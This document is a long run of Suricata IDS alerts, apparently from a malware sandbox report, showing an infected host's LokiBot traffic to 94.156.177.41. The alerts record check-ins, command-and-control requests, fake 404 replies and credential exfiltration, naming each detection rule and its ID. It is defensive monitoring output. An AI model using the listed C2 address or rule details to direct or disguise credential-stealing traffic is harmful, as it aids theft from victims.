Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49168 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49167 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49167 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49167 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49172 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49172 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49172
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49183 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49183 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49183 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49173 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49175 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49190 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49175 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49175 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49173 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49190 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49188 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49190 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49173 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49183 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49188 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49188 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49175 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49175 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49183 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49175
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49190 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49190 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49188 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49188 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49183
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49178 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49188
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49167 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49173 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49189 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49189 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49173 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49189 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49178 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49178 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49190
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49193 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49193 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49177 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49180 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49180 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49180 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49177 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49177 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49168 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49180 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49189 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49180 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49203 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49189 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49193 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49203 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49173
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49203 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49206 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49189
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49206 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49177 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49206 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49177 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49209 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49209 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49178 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49176 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49176 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49203 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49206 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49180
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49209 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49177
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49203 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49176 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49181 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49182
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49206 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49176 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49174 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49209 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49209 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49174 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49181 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49200 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49176 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49200 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49200 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49203
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49206
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49207 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49207 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49207 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49174 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49200 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49200 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49207 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49207 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49178 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49193 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49193 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49174 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49179 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49205 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49176
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49200
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49178
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49181 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49196
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49191 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49205 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49191 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49207
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49191 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49187 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49185
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49209
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49187 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49179 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49187 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49179 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49205 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49191 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49193
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49191 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49192
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49181 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49179 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49191
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49195
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49174 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49179 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49181 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49205 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49187 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49198
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49174
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49201 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49179
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49187 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49205 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49187
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49201 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49201 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49204 -> 94.156.177.41:80
